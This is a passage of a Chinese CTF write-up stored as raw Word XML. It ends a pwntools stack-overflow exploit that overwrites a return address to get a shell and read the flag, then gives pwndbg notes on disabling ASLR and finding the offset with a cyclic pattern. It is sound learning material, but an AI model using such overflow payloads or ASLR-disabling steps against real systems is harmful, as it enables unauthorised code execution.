      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>最后加上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>p64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>函数转换的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>fun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>函数的地址</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>b"a"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>b"b"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> p64(fun_addr) </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>定义</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>payload,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>一共需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>个字节数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>填充</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>s[15],</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>个字节数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>填充栈帧</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>(RBP)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>，这些都是垃圾数据</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>(payload)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">p.sendline(payload) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>发送</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">p.interactive() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t>获取靶机交互式终端</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078E135B" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看当前目录文件，发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，直接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>cat flag</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>flag{be9f04c1-5785-4642-a03e-e5e9c94b94d5}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7089440D" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:r>
        <w:pict w14:anchorId="3E24F8CB">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D049730" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="pwndbg动态调试"/>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pwndbg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>动态调试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1428FF01" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>buuCTF-rip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>把偏移量相当于是直接显示出来了，还不太了解有哪些地方可以用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pwndbg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，就写了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pwndbg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计算偏移量的笔记：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CB98CB" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="关闭-aslr避免地址随机化）"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>关闭</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ASLR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（避免地址随机化）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B1458A" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> tee /proc/sys/kernel/randomize_va_space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC595E7" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="调试与偏移计算"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调试与偏移计算</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A147F6F" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="生成测试输入"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成测试输入：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6987DC" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> pwn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t>open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>'input.txt'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>'wb'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>).write(cyclic(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8DE827" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以直接在终端输入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>python3 -c "from pwn import *; open('input.txt', 'wb').write(cyclic(100))"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 100 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>字节的测试输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(cyclic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>pattern)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>（默认</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> n=4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>模式）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650FE2ED" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="用-gdb--pwndbg-运行程序并触发崩溃"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GDB + Pwndbg </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行程序并触发崩溃</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D81983B" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>gdb ./fileName</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>r &lt; input.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>命令中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>的缩写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>&lt; input.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>的输入重定向语法，虽然写在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> GDB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>里</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>但</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> GDB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>支持它</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>它告诉操作系统：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>不要从键盘读取输入，而是从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>input.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>文件中读取内容，并“喂”给程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB9EC1E" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="从崩溃现场提取关键信息"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从崩溃现场提取关键信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA42F2F" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>崩溃后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Pwndbg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会显示寄存器和栈内容。重点关注：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B31AAF" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="方法-a看-rsp-指向的返回地址推荐）"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：看</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>RSP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指向的返回地址（推荐）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1361BE" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>───────────────────────[ REGISTERS ]───────────────────────</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>RSP  0x7fffffffe308 ◂— 'agaaahaaaiaaaj...'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B99C2BD" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>RSP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指向的就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>即将被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>弹出的返回地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D0AB4C" w14:textId="77777777" w:rsidR="0001234A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>取前</w:t>
